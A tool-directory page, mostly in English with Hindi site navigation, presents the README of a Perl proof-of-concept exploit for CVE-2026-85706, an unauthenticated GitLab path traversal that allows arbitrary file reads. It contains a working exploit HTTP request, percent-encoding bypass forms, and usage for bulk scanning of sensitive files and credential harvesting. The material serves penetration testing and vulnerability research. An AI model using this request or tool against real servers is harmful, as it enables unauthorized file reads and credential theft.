Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/gabrielunknown/cve-2026-85706
Vulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationInformation GatheringWeb SecurityPenetration TestingRed Teaming
GitHubgabrielunknown/cve-2026-85706

CVE-2026-85706

Perl PoC exploiting CVE-2026-85706, an unauthenticated GitLab path traversal enabling arbitrary file read, with bulk scanning and credential harvesting.

2719 दिन पहलेअभी तक समीक्षित नहीं
रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
अनुरोधित भाषा में सामग्री उपलब्ध नहीं है। अंग्रेज़ी संस्करण दिखाया जा रहा है।

CVE-2026-85706 — GitLab Unauthenticated Arbitrary File Read

CVSS GitLab License MITRE

For authorized penetration testing and Red Team operations only.
Unauthorized use constitutes a criminal offense. See Legal Notice.


Overview

CVE-2026-85706 is a CVSS 10.0 path traversal vulnerability in GitLab Community and Enterprise Editions that allows a completely unauthenticated attacker to read arbitrary files from the server filesystem with a single HTTP request. No credentials, no token, no user interaction required.

  • Disclosed: September 10, 2026
  • First exploitation observed: September 11, 2026 (within 6 hours of disclosure)
  • CISA KEV Added: September 11, 2026
  • Fixed in: GitLab 19.1.8 / 19.2.6 / 19.3.2

Affected Versions

BranchVulnerable RangeFixed In
18.x18.7 → 19.1.719.1.8
19.219.2.0 → 19.2.519.2.6
19.319.3.0 → 19.3.119.3.2

Technical Analysis

Architecture Context

GitLab's HTTP stack has three layers:

Internet → [Nginx] → [Workhorse (Go)] → [Puma (Ruby/Rack)] → [Rails/Grape API]

Workhorse acts as a smart reverse proxy: for certain "upload" endpoints (repository commits, file operations), it reads multipart request bodies, saves file data to disk, and rewrites the request before forwarding it to Puma. Crucially, it attaches a JWT header (Gitlab-Workhorse-Api-Request) to every request it proxies. Rails then validates this JWT (via require_gitlab_workhorse!) before executing any handler logic.

Root Cause — Three-Layer Path Decoding Mismatch

Layer 1 — Workhorse route matching:
Workhorse matches request paths using a compiled regex that operates on the raw, percent-encoded byte string. It does NOT decode %XX sequences before matching.

Layer 2 — Puma/Rack routing:
Puma decodes %XX sequences before Grape routes the request. So a request to /repository/%63ommits is decoded to /repository/commits and routed to CommitsController.

Layer 3 — Pre-auth file read:
Once in the Rails handler (which is reached without Workhorse's JWT because Workhorse never matched the request), the handler reads params[:file][:path] from the query string and calls:

File.open(params[:file][:path])   # ← happens BEFORE authentication

The Bypass Trick

By percent-encoding one character in a static path segment, the attacker's request slips past Workhorse undetected:

SegmentOriginalBypass FormEncoded Char
commitscommits%63ommitsc → %63
commitscommits%43ommitsC → %43
repositoryrepository%72epositoryr → %72
filesfiles%66ilesf → %66
(any)commitscommits/trailing slash
(any)commitscommits.jsonGrape suffix

Content Exfiltration Mechanism

After the file is opened, the content is exfiltrated via Rack's query-string parser:

Rack::Utils.parse_nested_query(File.read(path))

If the file contains a % not followed by two valid hex digits (which is common in Ruby config files, CI YAML, logs, etc.), Rack raises:

InvalidParameterError: Invalid parameter: invalid %-encoding (<FILE_BYTES>)

This 400-response body contains the raw file content up to and including the offending byte — revealing the file's contents to the unauthenticated caller.

Files without exploitable % sequences (e.g., clean /etc/passwd) return a 401 or parameter-validation error after the read: this acts as a file-existence oracle (the read still happened pre-authentication).

Exploit Request Structure

POST /api/v4/projects/1/repository/%63ommits?file=&file.path=%2Fetc%2Fpasswd&file.size=1&Content-Type=application%2Fx-www-form-urlencoded HTTP/1.1
Host: gitlab.corp.com
User-Agent: cve-2026-85706-perl-poc/1.0.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

MITRE ATT&CK Mapping

TechniqueIDImplementation in this PoC
File and Directory DiscoveryT1083--scan mode probes 38 sensitive server paths
Credentials In FilesT1552.001--harvest extracts keys/tokens/passwords from leaked content

Installation

Requirements

ModulePackageRole
LWP::UserAgentlibwww-perlHTTP client (mandatory)
LWP::Protocol::httpslibwww-perlHTTPS support (mandatory)
URI::Escapeliburi-perlQuery-string encoding (mandatory)
Term::ANSIColorlibterm-ansicolor-perlColored output (optional)
JSONlibjson-perlJSON output mode (optional)
# Debian/Ubuntu
apt install libwww-perl liburi-perl libterm-ansicolor-perl libjson-perl

# RHEL/Fedora
sudo yum install perl-libwww-perl perl-URI perl-Term-ANSIColor perl-JSON

# CPAN
cpan LWP::UserAgent LWP::Protocol::https Term::ANSIColor JSON

# Make executable
chmod +x exploit.pl

Usage

Usage: exploit.pl [OPTIONS]

Target:
  -u, --url <URL>            GitLab base URL            [default: http://localhost:8080]
  -p, --project-id <ID>      Numeric ID or namespace%2Fproject  [default: 1]
                              Commits API forms: project must be anonymously accessible
                              Files API forms:   any value works (file read precedes auth)

Exploitability check:
  -c, --check                Single-target check (quick by default — ≤9 requests)
      --full                 Upgrade to full 4-stage sweep (27+ probes, all 22 forms)
  -L, --check-host-list <FILE>  Check multiple targets (one URL/host per line)
                             Add --full for the 4-stage sweep on every host

Single-file read:
  -f, --file <PATH>          Absolute server path to read (e.g. /etc/passwd)

Scan mode (T1083 — File and Directory Discovery):
  -s, --scan                 Probe built-in sensitive-file wordlist (38 paths)
  -w, --wordlist <FILE>      Use a custom file list (one absolute path per line)
  -H, --harvest              Extract credentials from leaked content (T1552.001)

Output:
  -o, --output <FILE>        Tee all output to file
  -j, --json                 Emit results as JSON array (requires JSON.pm)
  -v, --verbose              Print full request URL before each probe
      --no-color             Disable ANSI colour output

Connection:
  -t, --timeout <N>          Per-request timeout in seconds  [default: 15]
  -d, --delay <N>            Delay between requests in seconds (float)  [default: 0]
  -r, --retries <N>          Retry count on connection error  [default: 2]
  -A, --user-agent <STR>     Override User-Agent string

Quick vs Full check

Quick (default)Full (--full)
Requests≤9 (1 preflight + ≤4×2)27+
Early exitYes — stops at first confirmed differentialNo — sweeps all 22 forms
Version infoNoYes
Bypass forms4 representative Files APIAll 22 (Commits + Files API)
Best forFast recon, large host listsPentest reports, --file/--scan prep
टूल डाउनलोड करें